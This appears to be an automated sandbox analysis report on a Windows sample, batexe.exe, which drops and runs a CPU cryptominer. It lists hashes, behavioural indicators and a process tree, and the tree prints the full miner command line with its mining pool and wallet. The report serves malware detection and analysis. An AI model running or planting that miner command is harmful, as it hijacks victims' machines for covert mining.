Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
309s -
max time network
334s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
12/02/2024, 03:05
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation b2e.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation batexe.exe -
Executes dropped EXE 2 IoCs
pid Process 4884 b2e.exe 5800 cpuminer-sse2.exe -
Loads dropped DLL 6 IoCs
pid Process 5800 cpuminer-sse2.exe 5800 cpuminer-sse2.exe 5800 cpuminer-sse2.exe 5800 cpuminer-sse2.exe 5800 cpuminer-sse2.exe 5800 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/6116-0-0x0000000000400000-0x000000000393A000-memory.dmp upx behavioral2/memory/6116-2-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 6116 wrote to memory of 4884 6116 batexe.exe 87 PID 6116 wrote to memory of 4884 6116 batexe.exe 87 PID 6116 wrote to memory of 4884 6116 batexe.exe 87 PID 4884 wrote to memory of 5220 4884 b2e.exe 88 PID 4884 wrote to memory of 5220 4884 b2e.exe 88 PID 4884 wrote to memory of 5220 4884 b2e.exe 88 PID 5220 wrote to memory of 5800 5220 cmd.exe 92 PID 5220 wrote to memory of 5800 5220 cmd.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:6116 -
C:\Users\Admin\AppData\Local\Temp\C0DA.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\C0DA.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\C0DA.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7565.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:5220 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5800
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
4.7MB
MD52f7f9b106bc7fe1781ce74d1b0a31cd6
SHA17aaf13c359924c2e830bd3096b20c1a1ae00947d
SHA25684b042aeb4d80d3460a6eb58a40f10c310689da23651c346863c00ccbd40df1d
SHA51281b9a0789c441e4ded757544c81d0df2c8d1ab316286e2812ab91041759a5fc544a974e773149e2214be455946e6546748872eef3e2fa4d4530e70610c9bf092
-
Filesize
5.9MB
MD5cc134c9c7c5e714b01be9707e037fc95
SHA12284cea08a41177d69b6a5d90bb172cc4069a132
SHA2563ee79cb08637c321367407f0f8a029e894a245c98b0c281cd850c920256e18c6
SHA5128af91fe9bdb439cf37eb47dfa5324fdc29e69f49d08189f94a2284a3708789cf03cecce3df7e9a2df3de5e3ad0409da3f0765239394d927d82974711b4ec856c
-
Filesize
8.6MB
MD5d71c9186f7488c0cf5c107f3f0f1103d
SHA1a8236c84ec7f366dc5cb4017f47b01fccf395466
SHA256ffdb1e15fac6afb4ecabff1ae9ae7881a55d92571125631f9e16055d2a721d2d
SHA51202f088844722e086227be7ebefe679d7070d77b06d4021c67faabdb4a543b1beb51330290fb011dc360486f503a7ad032ee77a2ffbb8f911bc398ef022f547eb
-
Filesize
272KB
MD5698d92af1f08b1380062cabd8a94b961
SHA1e6173ca8128904ff7613f031460a09e448f281d0
SHA2566adc914499a2fa7aa013eb19c3f39e644555855bf4acbfd1f8bd6b04884be9e3
SHA512b9eba3ff231876761b4f2a4cdaa1a235de3b2b911e02131ca3f40c513e4f4bec98c180080462ef13602fd6881f82c6abe5876cfdf618c0bbdfed3652f8d1a4ef
-
Filesize
618KB
MD5752bca37bb997bf8d2149c5be3e71b0a
SHA151463602360d3f69f1cae798c55a47a9201fd3ed
SHA256743b7717201a4e1e63aced22dbd67923048519335ee89af5f19c23d0756a6dd3
SHA512036e170dd8e58452255c1ace6d04aa9443248507cdf2ff5d896e9c68f02d732fd4fc2accd4eefc466ba7ceead8ca837002157ee0c84ada5469870ade19251de6
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
400KB
MD5af01c89880a124aeeb0747852f6e1393
SHA12a9f0eabe6dce46f6fbb6ea427348db88fe0d763
SHA256649f9284858ec8e0b3741f341c0455a02c224158021929384cab58b3dd19ccd5
SHA5127de723a2c7e4222023e77698a29546b74ffcfe3069d2b0ff8cc413f6a49065a25d65de33599362ebfbe381c17631535fbcaedd15953cca6e931d137b1afcd2d5
-
Filesize
838KB
MD5deacb35199e1692dad6909c52a641a23
SHA13a59d1aac831dc04c7994727c0fc92b3a2ed1a37
SHA2560bc78edbbe86a521cde20f69ab6f2e1be4b0b24f99cd9d04075cf5b559e2f0fa
SHA512362780b1173202032291c39ca82f76a337dcc734276680a966589d5b04979ba88171ae7adb7c1a4b113af8102428e23196b485333fe6951d72bcccd573e3a4ec
-
Filesize
906KB
MD5147a987d83fa68c0fc8ec3dca1c89e6f
SHA1a0b3ddd31663b9553a90ace13b803688acd6ec7e
SHA256b7fc34392d613b89f74766bc8a30a546a2c22494aa53b62d171511181d679d2f
SHA5128cd6f8f6335e2261fbd87428653cb1e542f8051da99a3d3878a6679c3f6bdf7a5b93e1c1cb128ee49344be18afc7a223be7731a94401eff3859ce5979d299acf
-
Filesize
780KB
MD539d959f4758de4a8d7115787e2a15c07
SHA1444a92835c32e9374317f8002e77330d861667b4
SHA256aabab70eda977998a479162829535e83772b5cf25a1fa47691d50cf9ec855cf9
SHA512ba27e5916eea912c6f0686e8b8453efe2fe6da65435703810419b3886c1cb0cc8ac7a8630f05cbb3899e61d2179986b9c6268a25e762f478d0e96af6833a021d
-
Filesize
549KB
MD543799d1c3b5aa5510ca6f570dd9ccd8f
SHA146c6abc53c5672b4bdd4b302212777840a07a107
SHA256b4ef0fea202e1736855ed84eff32fc573b8dc3f1b5c0eba01aa4d872540dd54d
SHA5126370595e4688372c8915d167dd81a1fdac1a1e08d6ecc408ba8dc052acf0bf913b7b52af0523dfe20a278d507a25558bf8a726a21c034a17cca92028ccd9dfe8
-
Filesize
919KB
MD5adc5424bc0a66b2fb2d360be1d2f20c9
SHA1c51da4f6fc1b9a6315fe52c273178024f89eb8e0
SHA2567f0012a2677a28747dd98538ee0a850d431dcbef0bcda591c15f81e46607acdd
SHA512aea95531ea8a8551de484603a5cba5e825dc6a92bb5d0060006841acb7516e05fc2af23ea6996d8497e16d4995853803e6160c978021dced33802741784e7bc5
-
Filesize
375KB
MD53c4b85741b2752584a81382d30301d35
SHA1c4bbf9092d501f625227873e537f33a863f06a76
SHA256b88656700097a9465f11d61b7cc359fe339cc07656bc386e2968176f15095d88
SHA512fee7b7ed6a37e7b98debd063b5c360725476ce7ee7a0f5dea64057e682ae15f57015cc08f6217e952630485b49aadccd8deb3788949952cc709e50d8db37c9d4
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770